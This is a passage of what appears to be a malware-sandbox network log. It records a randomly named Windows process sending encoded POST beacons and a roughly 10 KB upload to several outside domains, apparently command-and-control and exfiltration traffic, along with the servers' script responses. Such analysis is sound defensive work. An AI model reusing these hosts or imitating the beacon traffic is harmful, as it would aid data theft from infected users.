                                                      Data Raw: 31 62 39 0d 0a a1 38 1a 00 20 d3 72 fa fa 72 cc c2 85 08 62 4d c9 cc 5f eb 6f 8a b6 3e f3 81 73 a2 4e 74 aa 91 0d be 59 72 e2 80 27 5c 1e 75 a3 9f f0 aa 73 78 fa cf 4d a0 6b 17 12 83 20 a7 24 30 fd 49 0f b5 7a 03 fc a4 e2 78 86 c9 c6 a5 d7 7a f6 0a 41 3f 6c 6e 2c 94 ef fb 52 de 1e 31 72 5e 8b 08 70 2a d9 eb db 2e e6 21 d3 14 75 8d 9a 31 0e 82 5c 99 94 0e 1c 96 74 c4 44 22 f4 0f 71 3f fd 77 91 38 49 5f 05 fa 85 6b 25 da eb 5b 1c 2d b1 76 d6 68 59 d7 37 37 ad 10 fb 4b 7f 4f ff e1 f1 c5 da dd 97 17 f7 bd ed c3 0f 0c f3 38 59 08 71 b6 6d 97 87 f1 7d db bb 5c 96 28 95 b6 20 b2 8f d7 f9 76 1b b6 70 00 21 2a 2f ae 16 d0 a0 20 72 d8 e5 6c 48 e8 7f bc 3d 67 01 fa 0f 98 a5 10 de 99 d8 1a 47 08 8d dc 48 1d 24 13 ca 44 2f 4c eb 39 44 d8 c7 bc 36 9a 71 1e 68 4a 49 cb c0 8c e1 da b4 c2 50 a1 85 e7 26 eb b6 81 c2 e3 56 30 c2 89 24 cc 05 1d 9d 12 3c 11 a3 94 73 d1 79 19 02 cd 2d ee e2 63 98 36 ba 02 98 b2 f0 fe fe 2d bd be 59 58 22 0d 09 ec fc ee e1 55 1d 53 78 f9 7e 7a 2b 02 a6 d8 61 8f 50 09 3b c0 cc 0f ed 68 f2 [TRUNCATED]
                                                      Data Ascii: 1b98 rrbM_o>sNtYr'\usxMk $0IzxzA?ln,R1r^p*.!u1\tD"q?w8I_k%[-vhY77KO8Yqm}\( vp!*/ rlH=gGH$D/L9D6qhJIP&V0$<sy-c6-YX"USx~z+aP;h#AS!Gjr"v>+S5Cml%k%3@O%/e*>JF60


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       12 | 192.168.2.4 | 49814 | 185.27.134.206 | 80 | 792 | C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Dec 3, 2024 06:55:03.990909100 CET | 371 | OUT | GET /g3h7/?rfJh=dyqW+SkpLS8uL5dSny8q8PjeDBZe49z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BRpkPLcScFLLxAHuiMJY3F0pG7ioCFxuNP/M=&O258-=pHdHBdXhwLO HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      Host: www.canadavinreport.site
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                       Dec 3, 2024 06:55:05.230115891 CET | 1185 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Tue, 03 Dec 2024 05:55:05 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 984
                                                      Connection: close
                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                      Cache-Control: no-cache
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                      Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("053141613ac8da754e1977aadab6cc2f");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/g3h7/?rfJh=dyqW+SkpLS8uL5dSny8q8PjeDBZe49z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BRpkPLcScFLLxAHuiMJY3F0pG7ioCFxuNP/M=&O258-=pHdHBdXhwLO&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                      13          192.168.2.4  49833        106.15.109.33   80                792  C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      Timestamp                           Bytes transferred  Direction  Data
                                                      Dec 3, 2024 06:55:11.740147114 CET  629                OUT        POST /t322/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 201
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.yunlekeji.top
                                                      Origin: http://www.yunlekeji.top
                                                      Referer: http://www.yunlekeji.top/t322/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Ascii: rfJh=IA33BtMMTtUPeH/m+WeyPdo7XZoPCzqCmxS0ZyvmgEp3FKwkjSKnmtC4OV+lByI5QSH1ozIX+/2a5kXadTX6WfFgvP3xbvbrl/KeF4WmExg+CVCDHjanIYLF8a31xulbRZqSpEEI/mfC/MugUrWUf7ISR6tMc6Vb7X08ctjdXaVBX7e1K3T3R2NHlBImlRiz2g==


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                      14          192.168.2.4  49839        106.15.109.33   80                792  C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      Timestamp                           Bytes transferred  Direction  Data
                                                      Dec 3, 2024 06:55:14.402816057 CET  649                OUT        POST /t322/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 221
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.yunlekeji.top
                                                      Origin: http://www.yunlekeji.top
                                                      Referer: http://www.yunlekeji.top/t322/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Ascii: rfJh=IA33BtMMTtUPdnPmxRiyK9o4JJoPITqGmwu0ZzqrgSx3FqgkiTKnhtC4dV/vPSIuQSDXo2IX++Wa5lHadgP5XPFinv33VPbrl/KeF4qcExo+CgSDHGmgJYLE7a317OkSRZqspBcu/lnC/P6gV+iXU7JbJasjN74/7Gd3BPvtQ517fdTvbGygD2p04GBSoSf6tq0ifPKOh71BVtreQSivvIc=


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                      15          192.168.2.4  49847        106.15.109.33   80                792  C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      Timestamp                           Bytes transferred  Direction  Data
                                                      Dec 3, 2024 06:55:17.057569027 CET  10731              OUT        POST /t322/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 10301
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.yunlekeji.top
                                                      Origin: http://www.yunlekeji.top
                                                      Referer: http://www.yunlekeji.top/t322/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Ascii: rfJh= [TRUNCATED]


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                      16          192.168.2.4  49854        106.15.109.33   80                792  C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      Timestamp                           Bytes transferred  Direction  Data
                                                      Dec 3, 2024 06:55:19.709201097 CET  364                OUT        GET /t322/?rfJh=FCfXCbowRdQKA3bJwmXvc8lOOpkaFxffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XR69fnaXkcIGP7N+ZF5LcImJ8BAL5CR7GLvE=&O258-=pHdHBdXhwLO HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      Host: www.yunlekeji.top
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Dec 3, 2024 06:55:24.370456934 CET  1236               IN         HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Tue, 03 Dec 2024 05:55:24 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Data Ascii: 19f2<!DOCTYPE html><html><head> <meta charset="UTF-8"> <title></title> <meta name="robots" content="noindex,nofollow" /> <style> /* Base */ body { color: #333; font: 16px Verdana, "Helvetica Neue", helvetica, Arial, 'Microsoft YaHei', sans-serif; margin: 0; padding: 0 20px 20px; } h1{ margin: 10px 0 0; font-size: 28px; font-weight: 500; line-height: 32px; } h2{ color: #4288ce; font-weight: 400; padding: 6px 0; margin: 6px 0 0; font-size: 18px; border-bottom: 1px solid #eee; } h3{ margin: 12px; font-size: 16px; font-weight: bold; } abbr{ cursor: help; text-decoration: underline; text-decoration-style: dotted; } a{ color [TRUNCATED]
                                                      Dec 3, 2024 06:55:24.370481014 CET  1236               IN         Data Raw: [TRUNCATED]
                                                      Data Ascii: er; } a:hover{ text-decoration: underline; } .line-error{ background: #f8cbcb; } .echo table { width: 100%; } .echo pre { padding
                                                      Dec 3, 2024 06:55:24.370492935 CET  1236               IN         Data Raw: [TRUNCATED]
                                                      Data Ascii: border-radius: 4px; background: #999; } .exception .source-code{ padding: 6px; border: 1px solid #ddd; background: #f9f9f9; overflow-x: auto; }
                                                      Dec 3, 2024 06:55:24.370634079 CET  1236               IN         Data Raw: [TRUNCATED]
                                                      Data Ascii: x; font-size:14px; font-family: Consolas,"Liberation Mono",Courier,Verdana,""; } .exception .trace ol{ margin: 12px; } .exception .trace ol li{ padding: 2p
                                                      Dec 3, 2024 06:55:24.370646954 CET  1236               IN         Data Raw: [TRUNCATED]
                                                      Data Ascii: rd-break: break-all; } .exception-var table td:first-child{ width: 28%; font-weight: bold; white-space: nowrap; } .exception-var table td pre{ margin: 0; }
                                                      Dec 3, 2024 06:55:24.370659113 CET  663                IN         Data Raw: [TRUNCATED]
                                                      Data Ascii: alue */ pre.prettyprint .dec, pre.prettyprint .var { color: #606 } /* a declaration; a variable name */ pre.prettyprint .fun { color: red } /* a function name */ </style></head><body> <div class="echo">


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                      17          192.168.2.4  49878        45.141.156.114  80                792  C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      Timestamp                           Bytes transferred  Direction  Data
                                                      Dec 3, 2024 06:55:30.143064976 CET  626                OUT        POST /iuvu/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 201
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.logidant.xyz
                                                      Origin: http://www.logidant.xyz
                                                      Referer: http://www.logidant.xyz/iuvu/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Ascii: rfJh=1E6C75TZpJNES7yxMKVrIHTDD2FAQWuWG/cLzxXmPhtVFngX1QThN5EIScfuJE+0RgftajC9h9Ju0tl4vsGJRVb9/VSS+4HAn5wjb6tvBJjY+uwMTwhXsw54G+Gz7Eyz2iuJb1jpBBdlWPJetqS6Ss4htZUo9fii3D3qWAbaUBIpQkcY4lE882/D/mo1+kn9jw==
                                                      Dec 3, 2024 06:55:31.485246897 CET  691                IN         HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Tue, 03 Dec 2024 05:55:31 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 548
                                                      Connection: close
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                      18          192.168.2.4  49885        45.141.156.114  80                792  C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      Timestamp                           Bytes transferred  Direction  Data
                                                      Dec 3, 2024 06:55:32.805386066 CET  646                OUT        POST /iuvu/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 221
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.logidant.xyz
                                                      Origin: http://www.logidant.xyz
                                                      Referer: http://www.logidant.xyz/iuvu/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Ascii: rfJh=1E6C75TZpJNESbCxLthrBHTcNWFAe2vfG/YLzz67OT5VGFoX0SrhAZEIKMfrUU+9RgTfam69h8tu0oh4vbyKXFb/31SUwYHAn5wjb64ABJ7Y++AMST5YkQ55B+Gz/Ey32iuRb3bTBHZlWO5et4q5bs4vwpVd7aP1uz/qXgzucCcKYCRCpUlru2bwihhBzna045a+HSkwHsZuKt+SYx+Pk70=
                                                      Dec 3, 2024 06:55:34.106460094 CET  691                IN         HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Tue, 03 Dec 2024 05:55:33 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 548
                                                      Connection: close
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                      19          192.168.2.4  49892        45.141.156.114  80                792  C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      Timestamp                           Bytes transferred  Direction  Data
                                                      Dec 3, 2024 06:55:35.462796926 CET  10728              OUT        POST /iuvu/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 10301
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.logidant.xyz
                                                      Origin: http://www.logidant.xyz
                                                      Referer: http://www.logidant.xyz/iuvu/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Ascii: rfJh= [TRUNCATED]
                                                      Dec 3, 2024 06:55:36.784461021 CET  691                IN         HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Tue, 03 Dec 2024 05:55:36 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 548
                                                      Connection: close
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                      20          192.168.2.4  49898        45.141.156.114  80                792  C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      Timestamp                           Bytes transferred  Direction  Data
                                                      Dec 3, 2024 06:55:38.123507977 CET  363                OUT        GET /iuvu/?rfJh=4GSi4NjhieA+eby3OKR9UHmAChFha0TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5yneyjQ3W+H8Nz5kvkADuxuBf3arJIsYCs9inQ=&O258-=pHdHBdXhwLO HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      Host: www.logidant.xyz
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Dec 3, 2024 06:55:39.512082100 CET  691                IN         HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Tue, 03 Dec 2024 05:55:39 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 548
                                                      Connection: close
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       21 | 192.168.2.4 | 49916 | 23.225.159.42 | 80 | 792 | C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Dec 3, 2024 06:55:45.372932911 CET | 626 | OUT | POST /36be/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 201
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.laohub10.net
                                                      Origin: http://www.laohub10.net
                                                      Referer: http://www.laohub10.net/36be/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 2b 52 57 2f 42 36 57 30 66 4b 6d 61 64 49 78 36 6f 50 76 73 4d 2b 30 43 6c 59 47 50 47 50 54 78 32 4e 6d 46 75 69 6b 75 41 56 71 4b 63 2b 4a 33 31 7a 49 4c 77 35 31 64 6c 64 42 35 73 4d 36 31 47 50 32 4b 38 72 6f 73 38 45 2b 71 2f 69 79 4a 42 66 34 39 33 41 56 45 70 2f 6a 4c 59 53 79 33 36 4f 7a 30 69 61 62 50 4e 5a 46 36 58 2f 77 46 4d 61 53 6f 58 48 33 54 67 32 66 70 6f 78 71 65 71 53 59 47 35 32 4b 39 74 32 2b 78 43 63 48 68 76 67 2b 4c 4e 73 6d 75 46 47 71 43 49 69 6f 54 4f 56 5a 61 71 71 51 52 6e 2b 65 77 36 65 51 30 2b 4f 6a 34 4b 4b 35 48 63 32 68 76 52 79 49 7a 39 51 3d 3d
                                                      Data Ascii: rfJh=+RW/B6W0fKmadIx6oPvsM+0ClYGPGPTx2NmFuikuAVqKc+J31zILw51dldB5sM61GP2K8ros8E+q/iyJBf493AVEp/jLYSy36Oz0iabPNZF6X/wFMaSoXH3Tg2fpoxqeqSYG52K9t2+xCcHhvg+LNsmuFGqCIioTOVZaqqQRn+ew6eQ0+Oj4KK5Hc2hvRyIz9Q==
                                                       Dec 3, 2024 06:55:46.571362972 CET | 532 | IN | HTTP/1.1 200 OK
                                                      Server: Apache
                                                      Content-Type: text/html; charset=utf-8
                                                      Accept-Ranges: bytes
                                                      Cache-Control: max-age=86400
                                                      Age: 1
                                                      Connection: Close
                                                      Content-Length: 357
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED]
                                                      Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       22 | 192.168.2.4 | 49922 | 23.225.159.42 | 80 | 792 | C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Dec 3, 2024 06:55:48.029781103 CET | 646 | OUT | POST /36be/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 221
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.laohub10.net
                                                      Origin: http://www.laohub10.net
                                                      Referer: http://www.laohub10.net/36be/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 2b 52 57 2f 42 36 57 30 66 4b 6d 61 62 6f 68 36 6b 4a 6e 73 5a 4f 30 44 35 6f 47 50 4a 76 53 32 32 4e 36 46 75 6d 56 6c 42 6e 2b 4b 62 66 35 33 32 78 77 4c 39 5a 31 64 71 39 42 38 69 73 37 33 47 50 79 73 38 75 41 73 38 41 65 71 2f 6e 4f 4a 42 4f 34 2b 30 77 56 47 77 76 6a 4a 63 53 79 33 36 4f 7a 30 69 65 4c 70 4e 64 70 36 55 4f 41 46 4e 37 53 6e 5a 6e 33 55 33 47 66 70 6a 52 71 61 71 53 59 77 35 7a 53 62 74 77 36 78 43 65 66 68 76 31 65 4d 61 38 6d 30 4c 6d 72 67 43 48 59 57 4c 32 34 77 74 49 4d 75 70 39 71 53 2f 59 64 75 76 2f 43 76 59 4b 64 30 42 78 6f 62 63 78 31 36 6d 63 47 38 37 6b 30 4c 51 78 69 37 76 32 50 4d 55 69 33 33 43 79 51 3d
                                                      Data Ascii: rfJh=+RW/B6W0fKmaboh6kJnsZO0D5oGPJvS22N6FumVlBn+Kbf532xwL9Z1dq9B8is73GPys8uAs8Aeq/nOJBO4+0wVGwvjJcSy36Oz0ieLpNdp6UOAFN7SnZn3U3GfpjRqaqSYw5zSbtw6xCefhv1eMa8m0LmrgCHYWL24wtIMup9qS/Yduv/CvYKd0Bxobcx16mcG87k0LQxi7v2PMUi33CyQ=
                                                       Dec 3, 2024 06:55:49.212785006 CET | 532 | IN | HTTP/1.1 200 OK
                                                      Server: Apache
                                                      Content-Type: text/html; charset=utf-8
                                                      Accept-Ranges: bytes
                                                      Cache-Control: max-age=86400
                                                      Age: 1
                                                      Connection: Close
                                                      Content-Length: 357
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED]
                                                      Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       23 | 192.168.2.4 | 49931 | 23.225.159.42 | 80 | 792 | C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Dec 3, 2024 06:55:50.698746920 CET | 10728 | OUT | POST /36be/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 10301
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.laohub10.net
